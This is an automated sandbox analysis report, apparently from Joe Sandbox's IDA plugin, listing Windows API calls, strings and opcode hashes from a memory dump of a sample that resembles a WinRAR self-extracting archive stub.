                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: MessageSend$Item$TextWindow$Dialog
                  • String ID: LICENSEDLG
                  • API String ID: 3214253823-2177901306
                  • Opcode ID: 5d57715911e7d28cd43617363bd1ef9a20c78ef9324accf9a2a96a12592eeba9
                  • Instruction ID: b458036e1c0e3edfddfe3fadd23e5968c3eac57f7144663eef72c65b22e9a931
                  • Opcode Fuzzy Hash: 5d57715911e7d28cd43617363bd1ef9a20c78ef9324accf9a2a96a12592eeba9
                  • Instruction Fuzzy Hash: 56219E32240308BBD221DBA1BD49F7B3B6DFB57B57F010014F605A28E0DA629D02D772
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F9448
                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 009F946B
                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 009F948A
                    • Part of subcall function 00A017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,009FBB05,00000000,.exe,?,?,00000800,?,?,00A085DF,?), ref: 00A017C2
                  • _swprintf.LIBCMT ref: 009F9526
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                  • MoveFileW.KERNEL32(?,?), ref: 009F9595
                  • MoveFileW.KERNEL32(?,?), ref: 009F95D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                  • String ID: rtmp%d
                  • API String ID: 2111052971-3303766350
                  • Opcode ID: 388b05291327cfa6803937ef6b587c95538e6b3dd50f847b7e652ad74afa17ad
                  • Instruction ID: 1707a6114520becaa2482b4789e5e71032aee73de8dae698d88252d0633bb75c
                  • Opcode Fuzzy Hash: 388b05291327cfa6803937ef6b587c95538e6b3dd50f847b7e652ad74afa17ad
                  • Instruction Fuzzy Hash: 71413C7290025CA6CF20EBA48C85BFA737CAF95384F0444E5B649E3056EB748B89CB64
                  APIs
                  • __aulldiv.LIBCMT ref: 00A00A9D
                    • Part of subcall function 009FACF5: GetVersionExW.KERNEL32(?), ref: 009FAD1A
                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00A00AC0
                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00A00AD2
                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A00AE3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A00AF3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A00B03
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A00B3D
                  • __aullrem.LIBCMT ref: 00A00BCB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                  • String ID:
                  • API String ID: 1247370737-0
                  • Opcode ID: 4fc2139b3138afcf4dd169e31b7a338e20f792cd1a4ef9e069d8d6565570c00d
                  • Instruction ID: 5167178ebabb75a6eb468c89892169cf214608c82fa356166239bd66e33b7be9
                  • Opcode Fuzzy Hash: 4fc2139b3138afcf4dd169e31b7a338e20f792cd1a4ef9e069d8d6565570c00d
                  • Instruction Fuzzy Hash: 9B4129B24083099FC710DFA5D880A6BF7F8FB89714F004A2EF5D692650E778E549CB61
                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00A1F5A2,?,00000000,?,00000000,00000000), ref: 00A1EE6F
                  • __fassign.LIBCMT ref: 00A1EEEA
                  • __fassign.LIBCMT ref: 00A1EF05
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00A1EF2B
                  • WriteFile.KERNEL32(?,?,00000000,00A1F5A2,00000000,?,?,?,?,?,?,?,?,?,00A1F5A2,?), ref: 00A1EF4A
                  • WriteFile.KERNEL32(?,?,00000001,00A1F5A2,00000000,?,?,?,?,?,?,?,?,?,00A1F5A2,?), ref: 00A1EF83
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: d1a7c2cadecbf5238cc738e0158d3031cb785cb55408b5087620afe9d7e13c5f
                  • Instruction ID: 8fc545a152670cb51fb63c0c13c3618f0cb8fd9bbf2f988136927c87da77d694
                  • Opcode Fuzzy Hash: d1a7c2cadecbf5238cc738e0158d3031cb785cb55408b5087620afe9d7e13c5f
                  • Instruction Fuzzy Hash: 095185B1A00249AFDB10CFA8D845EEEBBF5FF09310F14452AED55E7291E7709982CB60
                  APIs
                  • GetTempPathW.KERNEL32(00000800,?), ref: 00A0C54A
                  • _swprintf.LIBCMT ref: 00A0C57E
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                  • SetDlgItemTextW.USER32(?,00000066,00A3946A), ref: 00A0C59E
                  • _wcschr.LIBVCRUNTIME ref: 00A0C5D1
                  • EndDialog.USER32(?,00000001), ref: 00A0C6B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                  • String ID: %s%s%u
                  • API String ID: 2892007947-1360425832
                  • Opcode ID: 7b6aeeb559c2cae6b1aae06a6c8db7aab790fca29a410cd1c01184f87cfc26e6
                  • Instruction ID: d034f3731e62fe9f34d8d7b2fab7ea3e4d7665b2f89d5d75be21fb865af0a69a
                  • Opcode Fuzzy Hash: 7b6aeeb559c2cae6b1aae06a6c8db7aab790fca29a410cd1c01184f87cfc26e6
                  • Instruction Fuzzy Hash: AB41B075D0061CAADB26DBA0EC45FEA77BDEF48311F0041A2F509E60A1E7719BC5CB50
                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00A08F38
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00A08F59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AllocByteCharGlobalMultiWide
                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                  • API String ID: 3286310052-4209811716
                  • Opcode ID: d800d0aa448e59313ade5e4c9921a1ccaa1adad0f43c8a0628d42700acc92730
                  • Instruction ID: 2cfe32bf7028aefb474a2961ce821c596a9f15144edd701ff3979c69e3909bd4
                  • Opcode Fuzzy Hash: d800d0aa448e59313ade5e4c9921a1ccaa1adad0f43c8a0628d42700acc92730
                  • Instruction Fuzzy Hash: E5317B3250831A7FDB20BB74FC02FAF7769EF51720F000529F941961D2EF689A4983A9
                  APIs
                  • ShowWindow.USER32(?,00000000), ref: 00A0964E
                  • GetWindowRect.USER32(?,00000000), ref: 00A09693
                  • ShowWindow.USER32(?,00000005,00000000), ref: 00A0972A
                  • SetWindowTextW.USER32(?,00000000), ref: 00A09732
                  • ShowWindow.USER32(00000000,00000005), ref: 00A09748
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Window$Show$RectText
                  • String ID: RarHtmlClassName
                  • API String ID: 3937224194-1658105358
                  • Opcode ID: c959773222234cb1041baa16d0b480b2bf434c8615f9b9ca1bd7c3f546c944f9
                  • Instruction ID: db3b0912be463e1b0084b31b6e32004e665c9af87d82ab21383ba783a6754fe1
                  • Opcode Fuzzy Hash: c959773222234cb1041baa16d0b480b2bf434c8615f9b9ca1bd7c3f546c944f9
                  • Instruction Fuzzy Hash: 6D31AE32504308AFDB119FA4EC48B6B7BA8FF49712F004659FA499A1A3CB34D945CF61
                  APIs
                    • Part of subcall function 00A1BF79: _free.LIBCMT ref: 00A1BFA2
                  • _free.LIBCMT ref: 00A1C003
                    • Part of subcall function 00A184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?), ref: 00A184F4
                    • Part of subcall function 00A184DE: GetLastError.KERNEL32(?,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?,?), ref: 00A18506
                  • _free.LIBCMT ref: 00A1C00E
                  • _free.LIBCMT ref: 00A1C019
                  • _free.LIBCMT ref: 00A1C06D
                  • _free.LIBCMT ref: 00A1C078
                  • _free.LIBCMT ref: 00A1C083
                  • _free.LIBCMT ref: 00A1C08E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction ID: 248604c16e40cf2f0cffabf06ea499dbf325f4889115c9fd7f14fd38c11ab9f4
                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction Fuzzy Hash: 15112171590B08FAD630BBB0CE07FCBB79D6F04700F408955B2D966452DF6AF9858BA0
                  APIs
                  • GetLastError.KERNEL32(?,?,00A120C1,00A0FB12), ref: 00A120D8
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A120E6
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A120FF
                  • SetLastError.KERNEL32(00000000,?,00A120C1,00A0FB12), ref: 00A12151
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: d6edb994fd026c2f49479e5de8d9b748c228dbf235994cc5d1a95d2031e65dfe
                  • Instruction ID: eaa46b460d001d5b1805051176f93403faca93f7e05b8732bc5c87efa747220d
                  • Opcode Fuzzy Hash: d6edb994fd026c2f49479e5de8d9b748c228dbf235994cc5d1a95d2031e65dfe
                  • Instruction Fuzzy Hash: 8B01D4372093117EAA74EBF97C856FA3A58EB227707210739F220590E0EF118CD79258
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                  • API String ID: 0-1718035505
                  • Opcode ID: 7930277480d0eee98a1867112a06aa8082cb3a502a3480b5458de42271220303
                  • Instruction ID: 951d2798f2ca8884f1c5b8fb879ffcfdd0f7d8ea40bfc330a069fe0d8c743174
                  • Opcode Fuzzy Hash: 7930277480d0eee98a1867112a06aa8082cb3a502a3480b5458de42271220303
                  • Instruction Fuzzy Hash: D2012D336423266BDF30AFFC7C856B65794BB43317320163EE501D7280DAA1C883D6A0
                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A00D0D
                    • Part of subcall function 009FACF5: GetVersionExW.KERNEL32(?), ref: 009FAD1A
                  • LocalFileTimeToFileTime.KERNEL32(?,00A00CB8), ref: 00A00D31
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A00D47
                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A00D56
                  • SystemTimeToFileTime.KERNEL32(?,00A00CB8), ref: 00A00D64
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A00D72
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion
                  • String ID:
                  • API String ID: 2092733347-0
                  • Opcode ID: b7ec986a48ca2f5f25042b6bc9853557daf52624a7235625560c2734bdece29f
                  • Instruction ID: 934b1f502b958784a0074f5c0f4b25fc40866a85037b0d304c347d1a03fa2c1d
                  • Opcode Fuzzy Hash: b7ec986a48ca2f5f25042b6bc9853557daf52624a7235625560c2734bdece29f
                  • Instruction Fuzzy Hash: 1D31B77A90020DABCF10DFE9D8859EEBBB8FF58700B04456AE955E3210E7349646CB65
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: 15e61ad01b4d9b12b0dd1fd16622f5f3a8d3f9279435907f0142b764fe53c617
                  • Instruction ID: 0ddd6162fbc92023188f85487b8cdf18128811e0d905d9f17ac46e09c8e5486e
                  • Opcode Fuzzy Hash: 15e61ad01b4d9b12b0dd1fd16622f5f3a8d3f9279435907f0142b764fe53c617
                  • Instruction Fuzzy Hash: 8021C471A0010EBBD7149F24ED81FBB77ADFB54788F108538FC09AB282E274ED558691
                  APIs
                  • GetLastError.KERNEL32(?,00A30EE8,00A13E14,00A30EE8,?,?,00A13713,00000050,?,00A30EE8,00000200), ref: 00A18FA9
                  • _free.LIBCMT ref: 00A18FDC
                  • _free.LIBCMT ref: 00A19004
                  • SetLastError.KERNEL32(00000000,?,00A30EE8,00000200), ref: 00A19011
                  • SetLastError.KERNEL32(00000000,?,00A30EE8,00000200), ref: 00A1901D
                  • _abort.LIBCMT ref: 00A19023
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: 552dfa046ede6557a98165b57c8cbd300471e1fd1e2d810a9e3aa74474e74a9f
                  • Instruction ID: 816df4ca598aaf6704bd380a9ef0a6005a6b7fd6acdcf2f387317eb364a36b05
                  • Opcode Fuzzy Hash: 552dfa046ede6557a98165b57c8cbd300471e1fd1e2d810a9e3aa74474e74a9f
                  • Instruction Fuzzy Hash: 63F028366096006AC631B36C6D0AFFB292B9BD1770F250134F415D2292EF2CC9C39021
                  APIs
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A0D2F2
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A0D30C
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A0D31D
                  • TranslateMessage.USER32(?), ref: 00A0D327
                  • DispatchMessageW.USER32(?), ref: 00A0D331
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A0D33C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                  • String ID:
                  • API String ID: 2148572870-0
                  • Opcode ID: 7c99ecff78c8edca1c9ef5b890a7931f310f091036c7491e8ad23049cd893307
                  • Instruction ID: 887b32c083cc73982ba38dc791f46141a741e55413b30bd737d774e30c258ce7
                  • Opcode Fuzzy Hash: 7c99ecff78c8edca1c9ef5b890a7931f310f091036c7491e8ad23049cd893307
                  • Instruction Fuzzy Hash: ABF0CD72A0221DABCA209BE5EC4CEDBBF6DEF56762B044021F606D6090D6259942C7B1
                  APIs
                  • _wcschr.LIBVCRUNTIME ref: 00A0C435
                    • Part of subcall function 00A017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,009FBB05,00000000,.exe,?,?,00000800,?,?,00A085DF,?), ref: 00A017C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CompareString_wcschr
                  • String ID: <$HIDE$MAX$MIN
                  • API String ID: 2548945186-3358265660
                  • Opcode ID: 2efddaf4c436017967b9152e3b163c669b57926fb85f566cf30a4cc3185a4eb5
                  • Instruction ID: 2da31a101405298876e118bbe7529ecf53549ff25e530369be53411612a139b1
                  • Opcode Fuzzy Hash: 2efddaf4c436017967b9152e3b163c669b57926fb85f566cf30a4cc3185a4eb5
                  • Instruction Fuzzy Hash: 2531A176E0020DAADB21DBA4EC85EEA77BDFB54360F004166FA04D20D0EBB18EC48A50
                  APIs
                  • LoadBitmapW.USER32(00000065), ref: 00A0ADFD
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00A0AE22
                  • DeleteObject.GDI32(00000000), ref: 00A0AE54
                  • DeleteObject.GDI32(00000000), ref: 00A0AE77
                    • Part of subcall function 00A09E1C: FindResourceW.KERNEL32(00A0AE4D,PNG,?,?,?,00A0AE4D,00000066), ref: 00A09E2E
                    • Part of subcall function 00A09E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E46
                    • Part of subcall function 00A09E1C: LoadResource.KERNEL32(00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E59
                    • Part of subcall function 00A09E1C: LockResource.KERNEL32(00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E64
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                  • String ID: ]
                  • API String ID: 142272564-3352871620
                  • Opcode ID: 94246b69a34ec67812d3d9a08c45fa2a9883e20dc663a8a15468ac12b8c93c72
                  • Instruction ID: c307855a405a53f7ef72aaf488e148232bad22a89b8ec08513f31d7bfcaeee05
                  • Opcode Fuzzy Hash: 94246b69a34ec67812d3d9a08c45fa2a9883e20dc663a8a15468ac12b8c93c72
                  • Instruction Fuzzy Hash: 6001D63298132DA7D710A7A4FD05B7F7B7AAB92B52F180115FD00A72D2DB718C1687B1
                  APIs
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  • EndDialog.USER32(?,00000001), ref: 00A0CCDB
